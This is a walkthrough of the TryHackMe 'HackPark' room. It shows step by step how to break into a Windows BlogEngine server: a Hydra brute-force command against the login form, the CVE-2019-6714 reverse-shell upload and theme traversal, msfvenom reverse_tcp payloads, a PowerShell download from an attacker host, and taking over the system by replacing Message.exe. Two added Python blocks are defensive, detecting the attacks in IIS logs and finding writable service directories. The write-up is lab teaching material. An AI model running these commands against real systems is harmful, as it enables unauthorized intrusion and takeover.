TryHackMe-HackPark
This room involves Hacking Windows with Hydra, RCE & WinPEAS. Start out with an Nmap scan on the target.
Name of the clown displayed — pennywise
Use Dirb/Gobuster to find hidden directories; we find an admin panel at /admin on the webserver. We use Hydra to brute-force it.
Explanation: We use the username "admin" and the http-post-form module, since the login page submits a POST request. We then have to enter three options in the following format:
"The directory of the webpage : the request body which we find using Burp : the error message we get after a failed login attempt"
1. The directory of the webpage is /Account/Login.aspx
2. Try intercepting the request using Burp Suite while logging in and you will get the request body. Copy from the __VIEWSTATE part onwards and paste it into your hydra command.
3. The error message is "Login Failed"
NOTE: the only change we have to make in the copied body is to set UserName=^USER^ and Password=^PASS^.
This is what the final hydra command will look like. Run it and you will get the password:
hydra -l admin -P /usr/share/wordlists/rockyou.txt $rhost http-post-form "/Account/login.aspx:__VIEWSTATE=J7%2FrKT%2FRbzXElHvOFArr4HX0BUp05PUs%2Bjl4fN5QtFnsigr6tjwFZkWaUW9RaCNkl5wcaaA9I71WXBKsdywllsO45a8kdE%2BO2GeciLswYLZgMhEIYMOLKvVE1g9%2FuxmOjygsPrfW43YX1axgD3V%2FmbHd2lx7jcwje7Qgkp065G2LekTQ&__EVENTVALIDATION=nIJxL4rdGJE3KYMzFDmVH35CAPYLfmVh68KpFWCfpmOAp8i4dLgnYkYLVP3UEDV8IiIqX6kXoIwujnQvd7xTK1Tbiqg5RF0fYL3q6nazJk37P%2BrLs8lq043TvaeMwGi4uqTkx2onf8prQt9NNxgtS4oXE0haNUx6xQId8O8kqlZfYRAG&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
Once you have logged in, go to the ABOUT section and you will get the version of the blog server that is running (searchsploit blogengine 3.3.6). The exploit can easily be found on Exploit-DB: CVE-2019-6714.
Download the exploit and carefully read the instructions. They are explained very simply:
First, we set the TcpClient address and port within the method below to our attack host, who has a reverse tcp listener. Next, we upload this file ... as PostView.ascx. The admin page that allows upload is: http://10.10.10.10/admin/app/editor/editpost.cshtml. Finally, the vulnerability is triggered by accessing ... http://10.10.10.10/?theme=../../App_Data/files
All you have to do is change the IP in the exploit code and save it as PostView.ascx, then go to "POSTS", edit the default post, and there is a small folder icon. Go there and upload your PostView.ascx.
Now start your netcat listener on port 4445 and do not exit or leave the browser tab. We have to edit the URL of the current webpage to
targetIP/?theme=../../App_Data/files
As soon as you hit enter and load this, you will get a reverse connection on netcat.
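The two steps above (the Hydra form brute-force against /Account/login.aspx and the theme=../../App_Data/files traversal of CVE-2019-6714) both leave distinctive traces in the web server's access log. The following is an added example, not part of the original write-up or of the exploit, showing how a defender would pick both out of IIS W3C logs. The log excerpt is constructed for the example (the column subset and addresses are assumptions, not captures from the room), and the threshold and window values are illustrative.

```python
"""Hunt for two HackPark attacker behaviours in IIS W3C logs: a burst of
POSTs against the BlogEngine.NET login page (a Hydra-style form brute-force)
and the theme-parameter directory traversal (CVE-2019-6714)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not captured from the room's target). Field names
# follow the IIS W3C logging format; the column subset is an assumption.
_BURST = "\n".join(
    f"2023-01-01 10:00:{i:02d} POST /Account/login.aspx - 10.0.0.5 200"
    for i in range(12)
)
SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2023-01-01 09:59:50 GET /Account/Login.aspx - 10.0.0.5 200
{_BURST}
2023-01-01 10:01:30 POST /Account/login.aspx - 10.0.0.9 200
2023-01-01 10:05:00 GET / theme=../../App_Data/files 10.0.0.5 200
2023-01-01 10:06:00 GET / theme=Standard 10.0.0.9 200
"""

LOGIN_PATH = "/account/login.aspx"  # IIS paths are case-insensitive, so compare lowercased
# Plain and URL-encoded dot-dot-slash / dot-dot-backslash.
TRAVERSAL = re.compile(r"\.\.(?:/|\\|%2f|%5c)", re.IGNORECASE)


def parse_w3c(text):
    """Return one dict per data row, keyed by the names in the #Fields: header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # skip rows that do not match the header instead of guessing
        rows.append(dict(zip(fields, parts)))
    return rows


def find_login_bursts(rows, threshold=10, window=timedelta(minutes=5)):
    """Return [(client_ip, most login POSTs seen inside any `window`)] for
    clients that reach `threshold`. A form brute-force is many POSTs to the
    same path within seconds, which a sliding window over timestamps counts."""
    per_ip = defaultdict(list)
    for r in rows:
        if r["cs-method"] == "POST" and r["cs-uri-stem"].lower() == LOGIN_PATH:
            per_ip[r["c-ip"]].append(datetime.fromisoformat(f"{r['date']} {r['time']}"))
    findings = []
    for ip, stamps in per_ip.items():
        stamps.sort()
        best, start = 0, 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1  # drop timestamps that fell out of the window
            best = max(best, end - start + 1)
        if best >= threshold:
            findings.append((ip, best))
    return findings


def find_theme_traversal(rows):
    """Return [(client_ip, query)] for requests whose theme= value walks up the tree."""
    hits = []
    for r in rows:
        query = r["cs-uri-query"]
        if query != "-" and "theme=" in query.lower() and TRAVERSAL.search(query):
            hits.append((r["c-ip"], query))
    return hits


if __name__ == "__main__":
    parsed = parse_w3c(SAMPLE_LOG)
    print("login bursts:", find_login_bursts(parsed))
    print("theme traversal:", find_theme_traversal(parsed))
```

The traversal check only needs the query string, so it works even when the upload of PostView.ascx itself looks like ordinary admin activity; the burst check is deliberately independent of status codes, because this login form returns 200 on both success and failure.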
We now have a low-level shell which we must try to upgrade to a meterpreter shell. To do so, we will have to make a payload using msfvenom, run it on the target Windows machine, and catch the connection using the multi/handler module of Metasploit.
First we create our payload.
NOTE: I have used shell_reverse_tcp here, so just replace it with meterpreter/reverse_tcp and you are good to go.
Now we run a Python HTTP server on our local machine using the command: python3 -m http.server
We use Invoke-WebRequest to transfer the file to our target machine. (You might notice below that we are moving the file to C:\Windows\Temp; this is because the Temp folder is often world-writable. If we try moving our file to some other folder on the target machine, we might get an error due to lack of permission.)
Before we execute the payload (WINPAYLOAD.exe) on our target, first let's make a handler in Metasploit to catch the connection. Just set the payload to windows/meterpreter/reverse_tcp instead of windows/shell_reverse_tcp.
Once you execute WINPAYLOAD.exe on the target machine (in our previous netcat shell) using the command .\WINPAYLOAD.exe, you will surely get a meterpreter shell here.
Getting a meterpreter shell makes work easier for us. You can run helpful commands like sysinfo and ps to get some idea about the target machine.
Now we can run winPEAS.exe from our meterpreter shell to further enumerate the target and find any possible privilege escalation vectors. Make sure you download winPEAS from GitHub; then we can simply upload and run winPEAS on our target using the commands:
upload winPEAS.exe
shell
winPEAS.exe
You will see a lot of data once it has been executed, and it will take quite some time. One juicy piece of information we get is this service called WindowsScheduler.
What is the name of the abnormal service running? - WindowsScheduler
What is the name of the binary you're supposed to exploit?
A binary is given in the winPEAS output: WService.exe. Just to confirm it, we can search for the application in Exploit-DB:
searchsploit splinterware
searchsploit -x 45072
Alternatively, this binary can also be found by searching the list of running processes and grepping for the WindowsScheduler service:
tasklist /svc | findstr /i windowsscheduler
However, this is for some reason not the correct answer. To find the correct binary name, we need to head to the service dir, which has an Events dir that contains a log file. Checking the log file reveals a binary that is run once in a while: Message.exe.
You can also try running tasklist /v to see all running processes, and you will see one called Message.exe.
cd C:\Program Files (x86)\SystemScheduler\Events
type 20198415519.INI_LOG.txt
The name of the binary is: Message.exe
The WindowsScheduler service runs periodically, calling Message.exe with root privilege. So we can obtain root by replacing Message.exe with an executable of our choice to spawn a reverse shell.
We now generate our own Message.exe executable with msfvenom, making sure a different lport is used.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -f exe -o Message.exe
Now start another Metasploit instance and start a listener like before, on the new lport. In the previous meterpreter, upload our Message.exe into the correct dir on the target machine.
cd "C:\Program Files (x86)\SystemScheduler"
upload Message.exe
Now wait a few minutes for WindowsScheduler to run, and we'll get another meterpreter with root. Run the whoami command to check whether you are root or not.
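The escalation above works only because the directory the scheduler runs Message.exe from can be written to by a normal user. As an added example (not from the original write-up), the following Python checks a directory's ACL listing for exactly that condition, which is the check an administrator would run to find and fix it. It assumes the listing comes from icacls on Windows; the two listings below are constructed sample output in that shape, not captured from the room's target, and the "hardened" one shows what the directory should look like (read and execute only for Users).

```python
"""Flag directories a service runs binaries from that low-privileged accounts
can write to, using the ACE lines that `icacls <dir>` prints."""
import re

# Constructed sample output in the shape icacls prints (assumption, not captured
# from the room): the first line carries the path, later ACEs are indented.
SVC_DIR = r"C:\Program Files (x86)\SystemScheduler"
WEAK_LISTING = r"""C:\Program Files (x86)\SystemScheduler BUILTIN\Users:(OI)(CI)(F)
                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
"""
HARDENED_LISTING = r"""C:\Program Files (x86)\SystemScheduler BUILTIN\Users:(I)(OI)(CI)(RX)
                                       NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                       BUILTIN\Administrators:(I)(OI)(CI)(F)
Successfully processed 1 files; Failed processing 0 files
"""

# Principals that any interactive or network user maps to (compared lowercased).
LOW_PRIV = {"everyone", "builtin\\users", "nt authority\\authenticated users", "builtin\\guests"}
# Simple rights (F, M, W) and granular rights that allow creating or replacing files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "DC", "WDAC", "WO"}
ACE_RE = re.compile(r"^(?P<identity>.+?):(?P<perms>(?:\([A-Z,]*\))+)$")


def parse_icacls(path, text):
    """Return [(identity, [right/flag tokens])] for each ACE in an icacls listing."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE shares its line with the path
        m = ACE_RE.match(line)
        if not m:
            continue  # summary lines and blanks carry no ACE
        tokens = []
        for group in re.findall(r"\(([^)]*)\)", m.group("perms")):
            tokens.extend(t for t in group.split(",") if t)  # e.g. "(RX,WD)"
        aces.append((m.group("identity"), tokens))
    return aces


def writable_by_low_priv(path, text):
    """Return the low-privileged identities holding a write right on `path`."""
    offenders = []
    for identity, tokens in parse_icacls(path, text):
        if "DENY" in tokens:
            continue  # a deny ACE removes rights rather than granting them
        if identity.lower() in LOW_PRIV and WRITE_RIGHTS.intersection(tokens):
            offenders.append(identity)
    return offenders


if __name__ == "__main__":
    print("weak:", writable_by_low_priv(SVC_DIR, WEAK_LISTING))
    print("hardened:", writable_by_low_priv(SVC_DIR, HARDENED_LISTING))
```

Any identity the check returns can replace the scheduled binary, so the fix is to strip the write right from that directory (and from the binary itself) and to run the service with the least privilege it actually needs rather than as a high-privilege account.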
Location of ROOT AND USER FLAGS
cat C:\Users\jeff\Desktop\user.txt
cat C:\Users\Administrator\Desktop\root.txt
SOLVING WITHOUT METASPLOIT
If you are able to solve with metasploit and have understood the concept, then solving it without metasploit is not much different.
Basically, to get an initial netcat shell we use windows/shell_reverse_tcp instead of windows/meterpreter/reverse_tcp. Then, to transfer our payload and the winPEAS file, we use Invoke-WebRequest instead of the upload command we had in Metasploit.
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/winPEAS.exe' -OutFile 'c:\windows\temp\winpeas.exe'"
Other than that, the rest of the process is the same.
BONUS:
If you connect to port 3389, which is the RDP port, you can actually see the root.txt flag on the desktop, and you also get a popup from the Message.exe service, which runs every 30 secs.
https://book.hacktricks.xyz/pentesting/pentesting-rdp
This was an intermediate-level machine and I hope you learned something by solving it. - ZEUS